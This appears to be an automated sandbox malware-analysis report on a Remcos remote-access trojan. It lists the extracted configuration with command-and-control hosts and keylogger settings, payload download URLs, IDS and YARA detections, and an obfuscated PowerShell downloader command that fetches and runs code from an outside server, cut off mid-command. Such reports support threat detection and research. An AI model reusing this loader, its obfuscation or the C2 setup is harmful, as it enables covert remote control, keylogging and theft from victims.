Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: http://geoplugin.net/json.gp |
URL Reputation: Label: phishing |
Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: jgbours284hawara01.duckdns.org |
Virustotal: Detection: 6% |
Source: jgbours284hawara01.duckdns.org |
Virustotal: Detection: 6% |
Source: http://87.121.105.163 |
Virustotal: Detection: 17% |
Source: http://87.121.105.163/Belyves242.hhk |
Virustotal: Detection: 15% |
Source: Yara match |
File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR |
Source: Yara match |
File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbj` source: powershell.exe, 00000005.00000002.2487543790.00000000072BF000.00000004.00000020.00020000.00000000.sdmp |
Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2116269833.0000023C50A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2118566911.0000023C4EC7B000.00000004.00000020.00020000.00000000.sdmp |
Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2487543790.000000000722D000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: Traffic |
Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49720 -> 45.88.90.110:3050 |
Source: Traffic |
Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.6:49720 |
Source: Malware configuration extractor |
URLs: jgbours284hawara01.duckdns.org |
Source: unknown |
DNS query: name: jgbours284hawara01.duckdns.org |
Source: global traffic |
TCP traffic: 192.168.2.6:49720 -> 45.88.90.110:3050 |
Source: global traffic |
HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache |
Source: Joe Sandbox View |
IP Address: 87.121.105.163 |
Source: Joe Sandbox View |
IP Address: 178.237.33.50 |
Source: Joe Sandbox View |
ASN Name: LVLT-10753US |
Source: global traffic |
HTTP traffic detected: GET /Belyves242.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
DNS traffic detected: queries for: jgbours284hawara01.duckdns.org |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163 |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Belyves242.hhkP |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Belyves242.hhkXR |
Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin |
Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi |
Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPv |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bini |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binm |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BF19000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.H |
Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/ |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpg |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpw |
Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5B4AD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe |
Source: amsi32_1492.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 5596 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 5596 |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. 
';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaa |